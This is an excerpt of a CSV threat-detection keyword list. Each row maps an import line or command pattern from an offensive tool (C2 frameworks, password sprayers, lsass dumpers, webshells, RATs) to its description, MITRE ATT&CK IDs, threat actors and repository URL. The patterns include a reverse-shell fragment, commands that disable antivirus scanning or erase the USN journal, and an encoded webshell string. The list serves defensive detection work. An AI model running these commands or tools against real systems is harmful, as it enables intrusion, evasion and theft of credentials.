*",".{0,1000}from\sBlankOBFv2\simport\s.{0,1000}","offensive_tool_keyword","BlankOBF","BlankOBF is a Python obfuscation tool designed to make Python programs harder to understand","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/Blank-c/BlankOBF","1","0","N/A","N/A","9","2","114","22","2024-12-23T02:53:41Z","2022-01-24T13:52:00Z","45295" "*from bofhound import *",".{0,1000}from\sbofhound\simport\s.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","N/A","5","4","328","56","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z","45296" "*from bofhound.ad import*",".{0,1000}from\sbofhound\.ad\simport.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - 
T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","N/A","5","4","328","56","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z","45297" "*from burp import *",".{0,1000}from\sburp\simport\s.{0,1000}","offensive_tool_keyword","ActiveScanPlusPlus","ActiveScan++ extends Burp Suite's active and passive scanning capabilities. Designed to add minimal network overhead. it identifies application behaviour that may be of interest to advanced testers","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/albinowax/ActiveScanPlusPlus","1","0","N/A","network exploitation tool","N/A","7","630","195","2025-04-17T10:47:54Z","2014-06-23T10:04:13Z","45298" "*from burp import*",".{0,1000}from\sburp\simport.{0,1000}","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","0","N/A","N/A","N/A","10","2153","405","2024-05-26T09:36:41Z","2020-06-08T10:50:12Z","45299" "*from conpass.ntlminfo import *",".{0,1000}from\sconpass\.ntlminfo\simport\s.{0,1000}","offensive_tool_keyword","conpass","Continuous password spraying tool","T1110.001 - T1110 - T1078.001 - T1201","TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://github.com/login-securite/conpass","1","0","N/A","N/A","10","2","181","17","2025-03-03T15:05:25Z","2022-12-15T18:03:42Z","45300" "*from conpass.password import *",".{0,1000}from\sconpass\.password\simport\s.{0,1000}","offensive_tool_keyword","conpass","Continuous password spraying tool","T1110.001 - T1110 - T1078.001 - T1201","TA0006 - TA0007 - TA0005","N/A","N/A","Credential 
Access","https://github.com/login-securite/conpass","1","0","N/A","N/A","10","2","181","17","2025-03-03T15:05:25Z","2022-12-15T18:03:42Z","45301" "*from DiscordBot import MitmPuppeter*",".{0,1000}from\sDiscordBot\simport\sMitmPuppeter.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","N/A","8","2","108","9","2024-11-07T10:41:00Z","2024-02-21T07:25:37Z","45303" "*from evilrdp.consolehelper*",".{0,1000}from\sevilrdp\.consolehelper.{0,1000}","offensive_tool_keyword","evilrdp","The evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","Black Basta","C2","https://github.com/skelsec/evilrdp","1","0","N/A","N/A","10","10","299","31","2025-03-15T13:37:21Z","2023-11-29T13:44:58Z","45304" "*from exploit import pdfjs*",".{0,1000}from\sexploit\simport\spdfjs.{0,1000}","offensive_tool_keyword","POC","CVE-2024-4367 poc exploitation","T1566","TA0042","N/A","N/A","Resource Development","https://github.com/rzte/pdf-exploit","1","0","N/A","N/A","6","3","216","41","2024-07-19T03:04:41Z","2024-07-11T14:33:11Z","45305" "*from Exrop import *",".{0,1000}from\sExrop\simport\s.{0,1000}","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation
tool","https://github.com/d4em0n/exrop","1","0","N/A","N/A","N/A","3","285","22","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z","45306" "*from gatox.attack.attack import *",".{0,1000}from\sgatox\.attack\.attack\simport\s.{0,1000}","offensive_tool_keyword","Gato-X","automate advanced enumeration and exploitation techniques against GitHub repositories and organizations","T1190 - T1083 - T1588 - T1587","TA0001 - TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/adnanekhan/Gato-X","1","0","N/A","N/A","7","3","270","35","2025-04-21T17:57:09Z","2024-01-27T18:55:16Z","45307" "*from gatox.attack.cicd_attack import *",".{0,1000}from\sgatox\.attack\.cicd_attack\simport\s.{0,1000}","offensive_tool_keyword","Gato-X","automate advanced enumeration and exploitation techniques against GitHub repositories and organizations","T1190 - T1083 - T1588 - T1587","TA0001 - TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/adnanekhan/Gato-X","1","0","N/A","N/A","7","3","270","35","2025-04-21T17:57:09Z","2024-01-27T18:55:16Z","45308" "*from gatox.cli import cli*",".{0,1000}from\sgatox\.cli\simport\scli.{0,1000}","offensive_tool_keyword","Gato-X","automate advanced enumeration and exploitation techniques against GitHub repositories and organizations","T1190 - T1083 - T1588 - T1587","TA0001 - TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/adnanekhan/Gato-X","1","0","N/A","N/A","7","3","270","35","2025-04-21T17:57:09Z","2024-01-27T18:55:16Z","45309" "*from gatox.cli.output import *",".{0,1000}from\sgatox\.cli\.output\simport\s.{0,1000}","offensive_tool_keyword","Gato-X","automate advanced enumeration and exploitation techniques against GitHub repositories and organizations","T1190 - T1083 - T1588 - T1587","TA0001 - TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/adnanekhan/Gato-X","1","0","N/A","N/A","7","3","270","35","2025-04-21T17:57:09Z","2024-01-27T18:55:16Z","45310" "*from gatox.github.api import 
*",".{0,1000}from\sgatox\.github\.api\simport\s.{0,1000}","offensive_tool_keyword","Gato-X","automate advanced enumeration and exploitation techniques against GitHub repositories and organizations","T1190 - T1083 - T1588 - T1587","TA0001 - TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/adnanekhan/Gato-X","1","0","N/A","N/A","7","3","270","35","2025-04-21T17:57:09Z","2024-01-27T18:55:16Z","45311" "*from gtfonow.*",".{0,1000}from\sgtfonow\..{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","45312" "*from helpers.*_smbserver * import SimpleSMBServer*",".{0,1000}from\shelpers\..{0,1000}_smbserver\s.{0,1000}\simport\sSimpleSMBServer.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","45313" "*from hiphp import *",".{0,1000}from\shiphp\simport\s.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. 
It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","0","N/A","N/A","10","10","217","33","2025-04-19T07:05:12Z","2021-04-05T20:29:57Z","45314" "*from holehe.core import*",".{0,1000}from\sholehe\.core\simport.{0,1000}","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","0","#linux","N/A","6","10","8656","981","2024-09-10T20:24:32Z","2020-06-25T23:03:02Z","45315" "*from https://github.com/S3cur3Th1sSh1t/Nim_Dinvoke*",".{0,1000}from\shttps\:\/\/github\.com\/S3cur3Th1sSh1t\/Nim_Dinvoke.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","N/A","10","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","45316" "*from https://www.stevencampbell.info/Nim-Convert-Shellcode-to-UUID*",".{0,1000}from\shttps\:\/\/www\.stevencampbell\.info\/Nim\-Convert\-Shellcode\-to\-UUID.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","N/A","10","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","45317" "*from impacket.*",".{0,1000}from\simpacket\..{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","45318" "*from knowsmore import knowsmore*",".{0,1000}from\sknowsmore\simport\sknowsmore.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","45319" "*from lib.config import *C2_COMMANDS*",".{0,1000}from\slib\.config\simport\s.{0,1000}C2_COMMANDS.{0,1000}","offensive_tool_keyword","Kraken","Kraken is a modular multi-language webshell focused on web post-exploitation and defense evasion.","T1505 - T1547 - T1218 - T1564.001","TA0003 - TA0005 - TA0011 ","N/A","N/A","C2","https://github.com/kraken-ng/Kraken","1","0","N/A","N/A","10","10","538","47","2024-02-10T20:10:18Z","2023-02-21T10:23:55Z","45320" "*from lib.core.specmodule import SpecModule*",".{0,1000}from\slib\.core\.specmodule\simport\sSpecModule.{0,1000}","offensive_tool_keyword","specula","Specula is a 
C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","45321" "*from Maitm.Maitm *",".{0,1000}from\sMaitm\.Maitm\s.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","N/A","8","2","108","9","2024-11-07T10:41:00Z","2024-02-21T07:25:37Z","45323" "*from merlin import *",".{0,1000}from\smerlin\simport\s.{0,1000}","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/merlin","1","0","N/A","N/A","10","10","94","16","2025-04-16T13:05:47Z","2021-01-25T12:36:46Z","45325" "*From Michael Zhmaylo (MzHmO)*",".{0,1000}From\sMichael\sZhmaylo\s\(MzHmO\).{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","N/A","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","45326" "*from 
mythic_container.MythicCommandBase*",".{0,1000}from\smythic_container\.MythicCommandBase.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/thanatos","1","0","N/A","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","45327" "*from mythic_container.MythicGoRPC*",".{0,1000}from\smythic_container\.MythicGoRPC.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/thanatos","1","0","N/A","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","45328" "*from networking.dhcp_dns_update_utils*",".{0,1000}from\snetworking\.dhcp_dns_update_utils.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","N/A","9","2","122","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z","45329" "*from o365spray.__main__*",".{0,1000}from\so365spray\.__main__.{0,1000}","offensive_tool_keyword","o365spray","Username enumeration and password spraying tool aimed at Microsoft O365","T1110.003 - T1087.002","TA0007 - TA0006","N/A","N/A","Credential Access","https://github.com/0xZDH/o365spray","1","0","#content","N/A","8","9","846","100","2024-11-06T00:49:23Z","2019-08-07T14:47:45Z","45330" "*from 
o365spray.core.utils*",".{0,1000}from\so365spray\.core\.utils.{0,1000}","offensive_tool_keyword","o365spray","Username enumeration and password spraying tool aimed at Microsoft O365","T1110.003 - T1087.002","TA0007 - TA0006","N/A","N/A","Credential Access","https://github.com/0xZDH/o365spray","1","0","#content","N/A","8","9","846","100","2024-11-06T00:49:23Z","2019-08-07T14:47:45Z","45331" "*from pwn import *",".{0,1000}from\spwn\simport\s.{0,1000}","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tool","https://github.com/d4em0n/exrop","1","0","N/A","N/A","N/A","3","285","22","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z","45332" "*from pysnaffler.rules.constants import *",".{0,1000}from\spysnaffler\.rules\.constants\simport\s.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","0","N/A","N/A","10","1","91","5","2025-03-15T13:46:34Z","2023-11-17T21:52:40Z","45333" "*from pysnaffler.rules.rule import SnaffleRule*",".{0,1000}from\spysnaffler\.rules\.rule\simport\sSnaffleRule.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. 
Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","0","N/A","N/A","10","1","91","5","2025-03-15T13:46:34Z","2023-11-17T21:52:40Z","45334" "*from pysnaffler.ruleset import SnafflerRuleSet*",".{0,1000}from\spysnaffler\.ruleset\simport\sSnafflerRuleSet.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","0","N/A","N/A","10","1","91","5","2025-03-15T13:46:34Z","2023-11-17T21:52:40Z","45335" "*from pysnaffler.scanner import SnafflerScanner*",".{0,1000}from\spysnaffler\.scanner\simport\sSnafflerScanner.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","0","N/A","N/A","10","1","91","5","2025-03-15T13:46:34Z","2023-11-17T21:52:40Z","45336" "*from pysnaffler.snaffler import *",".{0,1000}from\spysnaffler\.snaffler\simport\s.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. 
Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","0","N/A","N/A","10","1","91","5","2025-03-15T13:46:34Z","2023-11-17T21:52:40Z","45337" "*from randomizers.vbarandomizer import vbaRandomizer*",".{0,1000}from\srandomizers\.vbarandomizer\simport\svbaRandomizer.{0,1000}","offensive_tool_keyword","spinningteacup","identify different parts of a vba script and perform substitutions","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","45338" "*from rarce import exploit*",".{0,1000}from\srarce\simport\sexploit.{0,1000}","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","N/A","9","2","115","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z","45339" "*from ritm.lib import *",".{0,1000}from\sritm\.lib\simport\s.{0,1000}","offensive_tool_keyword","RITM","python Man in the middle ","T1557.002 - T1040 - T1098.002 - T1557.001 - T1552.001","TA0006 - TA0007 - TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/Tw1sm/RITM","1","0","N/A","N/A","9","3","292","27","2024-11-20T14:27:24Z","2022-10-05T01:10:33Z","45342" "*from ritm.logger import *",".{0,1000}from\sritm\.logger\simport\s.{0,1000}","offensive_tool_keyword","RITM","python Man in the middle ","T1557.002 - T1040 - T1098.002 - T1557.001 - T1552.001","TA0006 - TA0007 - TA0009 - TA0010","N/A","N/A","Sniffing & 
Spoofing","https://github.com/Tw1sm/RITM","1","0","N/A","N/A","9","3","292","27","2024-11-20T14:27:24Z","2022-10-05T01:10:33Z","45343" "*from server.changehostnPort import *",".{0,1000}from\sserver\.changehostnPort\simport\s.{0,1000}","offensive_tool_keyword","blackvision","Command line Remote Access tool (RAT) for Windows.","T1090 - T1095 - T1008","TA0011","N/A","N/A","Malware","https://github.com/quantumcore/blackvision","1","0","N/A","N/A","10","1","14","10","2019-09-16T18:32:51Z","2019-07-04T17:32:35Z","45344" "*from ShellcodeRDI import *",".{0,1000}from\sShellcodeRDI\simport\s.{0,1000}","offensive_tool_keyword","NamelessC2","A C2 with all its components written in Rust","T1102 - T1573.001 - T1027 - T1219 - T1205","TA0011 - TA0003 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/trickster0/NamelessC2","1","0","#content","N/A","10","10","266","33","2024-09-26T21:21:20Z","2024-09-26T21:06:37Z","45345" "*from shellcodes import *",".{0,1000}from\sshellcodes\simport\s.{0,1000}","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. 
It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","Black Basta","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","N/A","10","10","247","70","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z","45346" "*from spoofer_config import SpooferConfig*",".{0,1000}from\sspoofer_config\simport\sSpooferConfig.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","N/A","9","2","122","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z","45347" "*from spraycharles import *",".{0,1000}from\sspraycharles\simport\s.{0,1000}","offensive_tool_keyword","spraycharles","Low and slow password spraying tool","T1110.003 - T1110.001","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Tw1sm/spraycharles","1","0","N/A","N/A","10","2","195","32","2025-02-09T03:08:09Z","2018-09-17T11:17:47Z","45348" "*from tor2web import*",".{0,1000}from\stor2web\simport.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","45351" "*from wapitiCore.*",".{0,1000}from\swapitiCore\..{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","45352" "*from 
windows_downdate.*",".{0,1000}from\swindows_downdate\..{0,1000}","offensive_tool_keyword","WindowsDowndate","A tool that takes over Windows Updates to craft custom downgrades and expose past fixed vulnerabilities","T1072 - T1486 - T1505.002 - T1495 - T1499.004","TA0005 - TA0004 - TA0003 ","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/WindowsDowndate","1","0","N/A","N/A","10","7","663","88","2024-10-26T10:18:49Z","2024-01-08T19:42:47Z","45353" "*from winpwnage.*",".{0,1000}from\swinpwnage\..{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#content","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","45354" "*FromBase64String(""UmVxdWVzdC5JdGVtWyJ6Il0=""*",".{0,1000}FromBase64String\(\""UmVxdWVzdC5JdGVtWyJ6Il0\=\"".{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#base64 #content","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","45355" "*frpc.exe -c frpc.in*",".{0,1000}frpc\.exe\s\-c\sfrpc\.in.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - 
T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","45360" "*FruityC2.py*",".{0,1000}FruityC2\.py.{0,1000}","offensive_tool_keyword","FruityC2","FruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","1","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","45366" "*fscan -h */*",".{0,1000}fscan\s\-h\s.{0,1000}\/.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","45367" "*fscan.exe -*",".{0,1000}fscan\.exe\s\-.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","45368" "*fsockopen(*0.0.0.0*4444*exec(*",".{0,1000}fsockopen\(.{0,1000}0\.0\.0\.0.{0,1000}4444.{0,1000}exec\(.{0,1000}","offensive_tool_keyword","OMGLogger","Key logger which sends each and every key stroke of target remotely/locally.","T1056.001 - T1562.001","TA0004 - TA0010 - TA0040","N/A","N/A","Credential
Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/OMGLogger","1","0","N/A","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","45369" "*fsutil devdrv enable /disallowAv*",".{0,1000}fsutil\sdevdrv\senable\s\/disallowAv.{0,1000}","offensive_tool_keyword","fsutil","Disables antivirus filtering on the developer drive","T1112 - T1562.001 - T1222.001 - T1480","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://x.com/0gtweet/status/1720532496847167784","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","45370" "*fsutil.exe usn deletejournal /D C:*",".{0,1000}fsutil\.exe\susn\sdeletejournal\s\/D\sC\:.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","N/A","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","45371" "*ftp.cc.uoc.gr/mirrors/linux/blackarch/*/os/*",".{0,1000}ftp\.cc\.uoc\.gr\/mirrors\/linux\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","45372" 